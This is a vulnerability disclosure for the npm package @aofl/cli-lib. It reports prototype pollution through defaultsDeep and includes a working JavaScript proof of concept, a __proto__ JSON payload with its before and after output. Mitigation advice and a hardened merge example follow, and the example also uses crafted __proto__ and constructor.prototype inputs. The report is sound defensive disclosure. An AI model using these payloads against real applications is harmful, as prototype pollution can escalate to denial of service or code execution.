
Prototype Pollution vulnerability affecting aofl/cli-lib module, version 3.14.0 #35

@mestrtee

Description


All versions of this module are vulnerable to Prototype Pollution via defaultsDeep. The user-supplied value recursively copies all child properties to the destination without proper security validation.

An attacker can exploit this vulnerability by manipulating the prototype of Object, modifying the built-in Object.prototype through the reachable special properties __proto__ or constructor.prototype. This can potentially lead to the alteration of the behavior of all objects and, consequently, the attacker can escalate the attack to denial of service, remote code execution or privilege escalation.

Call stack:

defaultsDeep (@aofl/cli-lib/modules/defaults.js:13)

PoC:

(async () => {
  const lib = await import('@aofl/cli-lib');
  // JSON.parse creates an own "__proto__" property; defaultsDeep then recurses into it
  var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}')

  var victim = {}
  console.log("Before Attack: ", JSON.stringify(victim.__proto__));
  try {
    lib.defaultsDeep({}, BAD_JSON)
  } catch (e) { }
  console.log("After Attack: ", JSON.stringify(victim.__proto__));
  delete Object.prototype.polluted;
})();

Output:

Before Attack:  {}
After Attack:  {"polluted":true}

Expected output after the patch:

Before Attack:  {}
After Attack:  {}

How to prevent:

  • Freeze the root prototype using Object.freeze
  • Require schema validation of JSON input.
  • Avoid using unsafe recursive merge functions.
  • Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.
  • As a best practice, use Map instead of Object.
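A hardened recursive merge that applies the mitigations listed above (skipping the special keys and building nested containers without a prototype), added here as an illustration; it is example code, not part of this issue or of @aofl/cli-lib, and safeDefaultsDeep, isPlainObject and the sample input are constructed for the demonstration:

```javascript
// Added example, not @aofl/cli-lib code: a defaults-style deep merge that
// refuses the keys through which a merge can reach Object.prototype.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

function isPlainObject(value) {
  if (value === null || typeof value !== 'object' || Array.isArray(value)) return false;
  const proto = Object.getPrototypeOf(value);
  return proto === Object.prototype || proto === null;
}

// Copies own properties of `source` into `target` only where `target` has no
// own property of that name (defaults semantics), recursing into plain objects.
// Special keys are skipped, and nested containers created on `target` have no
// prototype, so a crafted key can never write onto the shared prototype chain.
function safeDefaultsDeep(target, source) {
  for (const key of Object.keys(source)) {        // own, enumerable keys only
    if (FORBIDDEN_KEYS.has(key)) continue;         // never walk onto the prototype
    const value = source[key];
    if (isPlainObject(value)) {
      if (!hasOwn(target, key)) target[key] = Object.create(null);
      else if (!isPlainObject(target[key])) continue; // existing scalar wins
      safeDefaultsDeep(target[key], value);
    } else if (!hasOwn(target, key)) {
      target[key] = value;
    }
  }
  return target;
}

// Constructed untrusted input: the __proto__ payload from the report plus a
// constructor.prototype variant and an ordinary nested option.
function demo() {
  const untrusted = JSON.parse(
    '{"__proto__":{"polluted":true},' +
    '"constructor":{"prototype":{"polluted":true}},' +
    '"opts":{"retries":3}}'
  );
  const merged = safeDefaultsDeep({ opts: { timeout: 1000 } }, untrusted);
  // A fresh object must not see `polluted`; ordinary defaults still apply.
  return { polluted: ({}).polluted, merged };
}

const result = demo();
console.log('Object.prototype polluted:', result.polluted !== undefined); // false
console.log('merged opts:', result.merged.opts);
```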
